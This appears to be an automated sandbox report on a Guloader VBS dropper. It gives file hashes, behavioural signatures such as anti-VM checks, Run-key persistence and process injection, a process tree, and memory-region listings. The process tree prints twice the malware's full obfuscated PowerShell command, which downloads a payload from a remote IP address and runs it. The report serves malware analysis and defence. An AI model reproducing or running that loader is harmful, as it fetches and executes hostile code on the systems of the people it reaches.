Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/03/2023, 03:36

General

  • Target

    Vejlensisk90.vbs

  • Size

    34KB

  • MD5

    5794e47d892a3cab512697ca7dc223f4

  • SHA1

    91f1ac9d1f3209bc5d1bc790319c3675d5a201ed

  • SHA256

    ffe477577469c87c606e0cbd9d0da68446cd8d895e4f4ab0a083f0a05ac8ab20

  • SHA512

    3699ec735f33e5b9c2c2d5b18ee75e15b736205adf65db8d30df0b56e7c5b0054f73d1eeb6f01e0e85aacbc5ea6cd004bd90c3f8c84b18db5cdf6ee3c2a1d228

  • SSDEEP

    768:UObCrpGDPcJLDAxj/gqJ77UgZw3d81bXK4HkMCYFN:J2rpkP2DABveKwNSbXFN

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Vejlensisk90.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:488
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          4⤵
            PID:3120
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            4⤵
              PID:5028
            • C:\Program Files (x86)\internet explorer\ieinstal.exe
              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
              4⤵
                PID:4384
              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                4⤵
                  PID:1520
                • C:\Program Files (x86)\internet explorer\ieinstal.exe
                  "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                  4⤵
                    PID:2068
                  • C:\Program Files (x86)\internet explorer\ieinstal.exe
                    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                    4⤵
                      PID:4016
                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      4⤵
                        PID:4580
                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                        4⤵
                          PID:3456
                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                          4⤵
                            PID:4644
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            4⤵
                              PID:3860
                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                              4⤵
                                PID:3404
                              • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                4⤵
                                • Checks QEMU agent file
                                • Adds Run key to start application
                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetWindowsHookEx
                                PID:1620

                        Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xr2azpp.wv4.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • memory/488-168-0x00000000077D0000-0x0000000007E4A000-memory.dmp

                                Filesize

                                6.5MB

                              • memory/488-171-0x0000000007350000-0x0000000007372000-memory.dmp

                                Filesize

                                136KB

                              • memory/488-181-0x00000000089B0000-0x000000000E48F000-memory.dmp

                                Filesize

                                90.9MB

                              • memory/488-182-0x0000000007EC0000-0x0000000007EC1000-memory.dmp

                                Filesize

                                4KB

                              • memory/488-150-0x0000000002860000-0x0000000002896000-memory.dmp

                                Filesize

                                216KB

                              • memory/488-151-0x0000000005270000-0x0000000005898000-memory.dmp

                                Filesize

                                6.2MB

                              • memory/488-152-0x00000000051B0000-0x00000000051D2000-memory.dmp

                                Filesize

                                136KB

                              • memory/488-154-0x0000000005B00000-0x0000000005B66000-memory.dmp

                                Filesize

                                408KB

                              • memory/488-153-0x0000000005A90000-0x0000000005AF6000-memory.dmp

                                Filesize

                                408KB

                              • memory/488-160-0x0000000002810000-0x0000000002820000-memory.dmp

                                Filesize

                                64KB

                              • memory/488-161-0x0000000002810000-0x0000000002820000-memory.dmp

                                Filesize

                                64KB

                              • memory/488-166-0x0000000006170000-0x000000000618E000-memory.dmp

                                Filesize

                                120KB

                              • memory/488-167-0x0000000002810000-0x0000000002820000-memory.dmp

                                Filesize

                                64KB

                              • memory/488-179-0x0000000002810000-0x0000000002820000-memory.dmp

                                Filesize

                                64KB

                              • memory/488-178-0x0000000002810000-0x0000000002820000-memory.dmp

                                Filesize

                                64KB

                              • memory/488-169-0x0000000006700000-0x000000000671A000-memory.dmp

                                Filesize

                                104KB

                              • memory/488-177-0x0000000002810000-0x0000000002820000-memory.dmp

                                Filesize

                                64KB

                              • memory/488-172-0x0000000008400000-0x00000000089A4000-memory.dmp

                                Filesize

                                5.6MB

                              • memory/488-173-0x00000000077A0000-0x00000000077B4000-memory.dmp

                                Filesize

                                80KB

                              • memory/488-170-0x00000000073F0000-0x0000000007486000-memory.dmp

                                Filesize

                                600KB

                              • memory/1620-183-0x0000000000C00000-0x00000000066DF000-memory.dmp

                                Filesize

                                90.9MB

                              • memory/1620-184-0x0000000000C00000-0x00000000066DF000-memory.dmp

                                Filesize

                                90.9MB

                              • memory/1620-186-0x0000000000C00000-0x00000000066DF000-memory.dmp

                                Filesize

                                90.9MB

                              • memory/4220-174-0x0000015BBEAA0000-0x0000015BBEAB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/4220-176-0x0000015BBEAA0000-0x0000015BBEAB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/4220-175-0x0000015BBEAA0000-0x0000015BBEAB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/4220-147-0x0000015BBEAA0000-0x0000015BBEAB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/4220-142-0x0000015BA4E70000-0x0000015BA4E92000-memory.dmp

                                Filesize

                                136KB

                              • memory/4220-149-0x0000015BBEAA0000-0x0000015BBEAB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/4220-148-0x0000015BBEAA0000-0x0000015BBEAB0000-memory.dmp

                                Filesize

                                64KB